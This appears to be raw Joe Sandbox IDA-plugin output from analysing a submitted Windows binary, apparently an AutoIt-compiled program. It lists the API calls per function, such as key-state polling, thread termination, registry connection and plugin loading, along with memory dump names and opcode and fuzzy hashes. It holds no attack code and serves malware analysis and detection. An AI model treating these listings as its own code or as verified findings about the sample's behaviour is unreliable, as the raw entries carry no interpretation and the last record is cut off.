                                                                                                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                APIs
                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3495660284-0
                                                                                                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                APIs
                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual
                                                                                                • String ID:
                                                                                                • API String ID: 4278518827-0
                                                                                                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                • __freefls@4.LIBCMT ref: 00415209
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                • String ID:
                                                                                                • API String ID: 442100245-0
                                                                                                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                APIs
                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                • _wcslen.LIBCMT ref: 0045F94A
                                                                                                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                • String ID: 0
                                                                                                • API String ID: 621800784-4108050209
                                                                                                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                • String ID: \VH
                                                                                                • API String ID: 3884216118-234962358
                                                                                                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                • String ID: AU3_GetPluginDetails$#v
                                                                                                • API String ID: 145871493-3662034293
                                                                                                • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                APIs
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                • IsMenu.USER32(?), ref: 0044854D
                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                • DrawMenuBar.USER32 ref: 004485AF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                • String ID: 0
                                                                                                • API String ID: 3076010158-4108050209
                                                                                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$_memmove_wcslen
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 1589278365-1403004172
                                                                                                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Handle
                                                                                                • String ID: nul
                                                                                                • API String ID: 2519475695-2873401336
                                                                                                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Handle
                                                                                                • String ID: nul
                                                                                                • API String ID: 2519475695-2873401336
                                                                                                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: SysAnimate32
                                                                                                • API String ID: 0-1011021900
                                                                                                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                APIs
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                • GetFocus.USER32 ref: 0046157B
                                                                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                • __swprintf.LIBCMT ref: 00461608
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                • String ID: %s%d
                                                                                                • API String ID: 2645982514-1110647743
                                                                                                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                • String ID:
                                                                                                • API String ID: 3488606520-0
                                                                                                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 15295421-0
                                                                                                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                APIs
                                                                                                • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3539004672-0
                                                                                                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 327565842-0
                                                                                                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
